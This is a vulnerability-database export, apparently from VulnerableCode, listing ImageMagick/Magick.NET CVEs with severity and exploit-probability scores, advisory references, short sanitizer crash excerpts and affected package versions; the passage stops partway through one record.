value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpg4-j99f-8xcg
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:34:45Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpg4-j99f-8xcg
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30937
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30937
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445882
reference_id 2445882
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445882
8
reference_url https://github.com/advisories/GHSA-qpg4-j99f-8xcg
reference_id GHSA-qpg4-j99f-8xcg
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qpg4-j99f-8xcg
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-30937, GHSA-qpg4-j99f-8xcg
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2zje-ag2v-7kac
5
url VCID-54da-fzyt-4ud2
vulnerability_id VCID-54da-fzyt-4ud2
summary 
ImageMagick has stack write buffer overflow in MNG encoder
A stack buffer overflow vulnerability exists in the MNG encoder. There is a bounds checks missing that could corrupting the stack with attacker-controlled data.

```
==2265506==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffec4971310 at pc 0x55e671b8a072 bp 0x7ffec4970f70 sp 0x7ffec4970f68
WRITE of size 1 at 0x7ffec4971310 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28690.json
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28690.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28690
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02346
published_at 2026-04-09T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02324
published_at 2026-04-08T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02321
published_at 2026-04-07T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02326
published_at 2026-04-04T12:55:00Z
4
value 0.00013
scoring_system epss
scoring_elements 0.02316
published_at 2026-04-02T12:55:00Z
5
value 0.00015
scoring_system epss
scoring_elements 0.02943
published_at 2026-04-21T12:55:00Z
6
value 0.00015
scoring_system epss
scoring_elements 0.02856
published_at 2026-04-11T12:55:00Z
7
value 0.00015
scoring_system epss
scoring_elements 0.02837
published_at 2026-04-12T12:55:00Z
8
value 0.00015
scoring_system epss
scoring_elements 0.02832
published_at 2026-04-13T12:55:00Z
9
value 0.00015
scoring_system epss
scoring_elements 0.02817
published_at 2026-04-16T12:55:00Z
10
value 0.00015
scoring_system epss
scoring_elements 0.02826
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28690
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28690
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28690
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7h7q-j33q-hvpf
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T15:58:08Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7h7q-j33q-hvpf
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28690
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28690
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445887
reference_id 2445887
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445887
9
reference_url https://github.com/advisories/GHSA-7h7q-j33q-hvpf
reference_id GHSA-7h7q-j33q-hvpf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7h7q-j33q-hvpf
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28690, GHSA-7h7q-j33q-hvpf
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-54da-fzyt-4ud2
6
url VCID-569d-6nue-5kbq
vulnerability_id VCID-569d-6nue-5kbq
summary 
ImageMagick releases an invalid pointer in BilateralBlur when memory allocation fails
The BilateralBlurImage method will allocate a set of double buffers inside AcquireBilateralTLS. But the last element in the set is not properly initialized. This will result in a release of an invalid pointer inside DestroyBilateralTLS when the memory allocation fails.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-22770.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-22770.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-22770
reference_id
reference_type
scores
0
value 0.00067
scoring_system epss
scoring_elements 0.2077
published_at 2026-04-21T12:55:00Z
1
value 0.00067
scoring_system epss
scoring_elements 0.20785
published_at 2026-04-18T12:55:00Z
2
value 0.00067
scoring_system epss
scoring_elements 0.20793
published_at 2026-04-16T12:55:00Z
3
value 0.00067
scoring_system epss
scoring_elements 0.20803
published_at 2026-04-13T12:55:00Z
4
value 0.00067
scoring_system epss
scoring_elements 0.20855
published_at 2026-04-12T12:55:00Z
5
value 0.00067
scoring_system epss
scoring_elements 0.20898
published_at 2026-04-11T12:55:00Z
6
value 0.00067
scoring_system epss
scoring_elements 0.20883
published_at 2026-04-09T12:55:00Z
7
value 0.00067
scoring_system epss
scoring_elements 0.20822
published_at 2026-04-08T12:55:00Z
8
value 0.00067
scoring_system epss
scoring_elements 0.20743
published_at 2026-04-07T12:55:00Z
9
value 0.00067
scoring_system epss
scoring_elements 0.2097
published_at 2026-04-02T12:55:00Z
10
value 0.00067
scoring_system epss
scoring_elements 0.21028
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-22770
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/3e0330721020e0c5bb52e4b77c347527dd71658e
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-21T20:05:17Z/
url https://github.com/ImageMagick/ImageMagick/commit/3e0330721020e0c5bb52e4b77c347527dd71658e
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-39h3-g67r-7g3c
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-21T20:05:17Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-39h3-g67r-7g3c
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-22770
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-22770
8
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126074
reference_id 1126074
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126074
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2431037
reference_id 2431037
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2431037
10
reference_url https://github.com/advisories/GHSA-39h3-g67r-7g3c
reference_id GHSA-39h3-g67r-7g3c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-39h3-g67r-7g3c
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2zje-ag2v-7kac
4
vulnerability VCID-54da-fzyt-4ud2
5
vulnerability VCID-5uyd-bv33-h7g1
6
vulnerability VCID-5zkt-kcgx-a3e2
7
vulnerability VCID-62ar-kwbq-nyh3
8
vulnerability VCID-69f6-ceje-hyah
9
vulnerability VCID-6h7x-3rue-kucp
10
vulnerability VCID-6rma-wjdv-uqe9
11
vulnerability VCID-6ztv-auh8-27gx
12
vulnerability VCID-acsa-1uwk-fqee
13
vulnerability VCID-anyp-2jr7-73a1
14
vulnerability VCID-b5pd-kk97-gban
15
vulnerability VCID-bd1g-sfsp-37h7
16
vulnerability VCID-bw4q-dt1r-y3e4
17
vulnerability VCID-cbqr-aybx-d3e6
18
vulnerability VCID-cuhw-ew1g-s3h2
19
vulnerability VCID-d8yf-8rff-3yhf
20
vulnerability VCID-dabd-m3mf-3ker
21
vulnerability VCID-dtza-65ku-aber
22
vulnerability VCID-emmr-15qp-vfah
23
vulnerability VCID-f1zu-xb4j-8qhp
24
vulnerability VCID-fnck-7mvx-hqc9
25
vulnerability VCID-g41y-dv8u-3yf1
26
vulnerability VCID-gdg8-aejn-83c4
27
vulnerability VCID-jc5m-7rvc-2qg6
28
vulnerability VCID-jcjk-s89c-mbbm
29
vulnerability VCID-jvq6-xjbu-fkb9
30
vulnerability VCID-kdw5-8y5z-zya5
31
vulnerability VCID-kefv-kpkk-wudf
32
vulnerability VCID-mntx-6yku-3qcx
33
vulnerability VCID-n47w-r932-abey
34
vulnerability VCID-p5aw-n691-nkff
35
vulnerability VCID-pcme-bwan-3bcf
36
vulnerability VCID-r3vw-ncns-cqgb
37
vulnerability VCID-rbdg-vz8x-ykah
38
vulnerability VCID-rj9n-ra1t-77dy
39
vulnerability VCID-rjkf-pdny-2fhn
40
vulnerability VCID-sd54-b8z1-2fg7
41
vulnerability VCID-sd7w-6qv5-73ge
42
vulnerability VCID-sdc2-fcap-abaz
43
vulnerability VCID-sw7g-hxxr-n3e1
44
vulnerability VCID-tv15-dcnu-pbbn
45
vulnerability VCID-utfe-h3b7-jqcj
46
vulnerability VCID-uvpj-a8v5-ebgz
47
vulnerability VCID-vpdn-g1k9-1kdn
48
vulnerability VCID-x44m-x33k-hydn
49
vulnerability VCID-x8c6-9pse-xkc8
50
vulnerability VCID-xbsu-ac6g-53fn
51
vulnerability VCID-y4hn-6bv6-jugw
52
vulnerability VCID-y58b-be93-hbfd
53
vulnerability VCID-yx7r-r7ez-7uhp
54
vulnerability VCID-z9t9-bxf9-hkfk
55
vulnerability VCID-zab9-9tqj-hbhg
56
vulnerability VCID-zpcy-nms7-kuha
57
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
aliases CVE-2026-22770, GHSA-39h3-g67r-7g3c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-569d-6nue-5kbq
7
url VCID-5uyd-bv33-h7g1
vulnerability_id VCID-5uyd-bv33-h7g1
summary 
ImageMagick: Heap overflow in sun decoder on 32-bit systems may result in out of bounds write
An Integer Overflow vulnerability exists in the sun decoder. On 32-bit systems/builds, a carefully crafted image can lead to an out of bounds heap write.

```
=================================================================
==1967675==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf190b50e at pc 0x5eae8777 bp 0xffb0fdd8 sp 0xffb0fdd0
WRITE of size 1 at 0xf190b50e thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25897.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25897.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25897
reference_id
reference_type
scores
0
value 0.00022
scoring_system epss
scoring_elements 0.06013
published_at 2026-04-21T12:55:00Z
1
value 0.00062
scoring_system epss
scoring_elements 0.19153
published_at 2026-04-16T12:55:00Z
2
value 0.00062
scoring_system epss
scoring_elements 0.19194
published_at 2026-04-13T12:55:00Z
3
value 0.00062
scoring_system epss
scoring_elements 0.19248
published_at 2026-04-12T12:55:00Z
4
value 0.00062
scoring_system epss
scoring_elements 0.19295
published_at 2026-04-11T12:55:00Z
5
value 0.00062
scoring_system epss
scoring_elements 0.19158
published_at 2026-04-07T12:55:00Z
6
value 0.00062
scoring_system epss
scoring_elements 0.19162
published_at 2026-04-18T12:55:00Z
7
value 0.00062
scoring_system epss
scoring_elements 0.1929
published_at 2026-04-09T12:55:00Z
8
value 0.00062
scoring_system epss
scoring_elements 0.19237
published_at 2026-04-08T12:55:00Z
9
value 0.00062
scoring_system epss
scoring_elements 0.1939
published_at 2026-04-02T12:55:00Z
10
value 0.00062
scoring_system epss
scoring_elements 0.19441
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25897
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25897
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25897
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/23fde73188ea32c15b607571775d4f92bdb75e60
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/23fde73188ea32c15b607571775d4f92bdb75e60
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6j5f-24fw-pqp4
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:23:43Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6j5f-24fw-pqp4
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25897
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25897
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442098
reference_id 2442098
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442098
10
reference_url https://github.com/advisories/GHSA-6j5f-24fw-pqp4
reference_id GHSA-6j5f-24fw-pqp4
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6j5f-24fw-pqp4
11
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25897, GHSA-6j5f-24fw-pqp4
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5uyd-bv33-h7g1
8
url VCID-5zkt-kcgx-a3e2
vulnerability_id VCID-5zkt-kcgx-a3e2
summary 
ImageMagick Has Signed Integer Overflow in SIXEL Decoder, Leading to Memory Corruption
A signed integer overflow vulnerability in ImageMagick's SIXEL decoder allows an attacker to trigger memory corruption and denial of service when processing a maliciously crafted SIXEL image file. The vulnerability occurs during buffer reallocation operations where pointer arithmetic using signed 32-bit integers overflows.

```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==143838==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000
    #0 0x7f379d5adb53  (/lib/x86_64-linux-gnu/libc.so.6+0xc4b53)
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25970.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25970.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25970
reference_id
reference_type
scores
0
value 0.00057
scoring_system epss
scoring_elements 0.17805
published_at 2026-04-21T12:55:00Z
1
value 0.00057
scoring_system epss
scoring_elements 0.17767
published_at 2026-04-18T12:55:00Z
2
value 0.00057
scoring_system epss
scoring_elements 0.17757
published_at 2026-04-16T12:55:00Z
3
value 0.00057
scoring_system epss
scoring_elements 0.17815
published_at 2026-04-13T12:55:00Z
4
value 0.00057
scoring_system epss
scoring_elements 0.17864
published_at 2026-04-12T12:55:00Z
5
value 0.00057
scoring_system epss
scoring_elements 0.17908
published_at 2026-04-11T12:55:00Z
6
value 0.00057
scoring_system epss
scoring_elements 0.17892
published_at 2026-04-09T12:55:00Z
7
value 0.00057
scoring_system epss
scoring_elements 0.17831
published_at 2026-04-08T12:55:00Z
8
value 0.00057
scoring_system epss
scoring_elements 0.17743
published_at 2026-04-07T12:55:00Z
9
value 0.00057
scoring_system epss
scoring_elements 0.17989
published_at 2026-04-02T12:55:00Z
10
value 0.00057
scoring_system epss
scoring_elements 0.18043
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25970
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25970
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25970
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xg29-8ghv-v4xr
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xg29-8ghv-v4xr
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25970
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25970
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442108
reference_id 2442108
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442108
9
reference_url https://github.com/advisories/GHSA-xg29-8ghv-v4xr
reference_id GHSA-xg29-8ghv-v4xr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xg29-8ghv-v4xr
10
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25970, GHSA-xg29-8ghv-v4xr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5zkt-kcgx-a3e2
9
url VCID-62ar-kwbq-nyh3
vulnerability_id VCID-62ar-kwbq-nyh3
summary 
ImageMagick has memory leak in msl encoder
Memory leak exists in `coders/msl.c`. In the `WriteMSLImage` function of the `msl.c` file, resources are allocated. But the function returns early without releasing these allocated resources. 

```
==78983== Memcheck, a memory error detector
==78983== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==78983== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info
==78983== 
==78983== 177,196 (13,512 direct, 163,684 indirect) bytes in 1 blocks are definitely lost in loss record 21 of 21
==78983==    at 0x4846828: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25638.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25638.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25638
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05082
published_at 2026-04-21T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.04934
published_at 2026-04-18T12:55:00Z
